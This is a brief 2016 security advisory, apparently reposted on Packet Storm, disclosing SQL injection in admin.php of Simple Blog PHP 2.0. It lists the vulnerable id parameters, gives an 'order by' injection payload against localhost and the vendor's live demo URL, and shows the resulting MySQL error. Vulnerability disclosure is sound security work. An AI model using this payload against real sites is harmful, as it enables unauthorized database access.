Simple Blog PHP version 2.0 suffers from a remote SQL injection vulnerability.
21f6a6aadaa0bf85ea8a973078fa5124f005f4d29b8c7202c26b3a8ef746f0d7=====================================================
# Simple Blog PHP 2.0 - SQL Injection
=====================================================
# Vendor Homepage: https://simpleblogphp.com/
# Date: 13 Oct 2016
# Demo Link : https://simpleblogphp.com/blog/admin.php
# Version : 2.0
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# SQL Injection
This vulnerability is in admin.php file when we want to edit a post or
edit a categorie and..., with id parameter can show sql injection.
#PoC:
Vulnerable Url:
https://localhost/blog/admin.php?act=editPost&id=[payload]
https://localhost/blog/admin.php?act=editCat&id=[payload]
https://localhost/blog/admin.php?act=editComment&id=[payload]
https://localhost/blog/admin.php?act=comments&post_id=[payload]
Vulnerable parameter : id
Mehod : GET
A simple inject :
Payload : '+order+by+999--+
https://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+
In response can see result :
Could not execute MySQL query: SELECT * FROM blog_posts WHERE id=''
order by 999-- ' . Error: Unknown column '999' in 'order clause'
Result of payload: Error: Unknown column '999' in 'order clause'
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed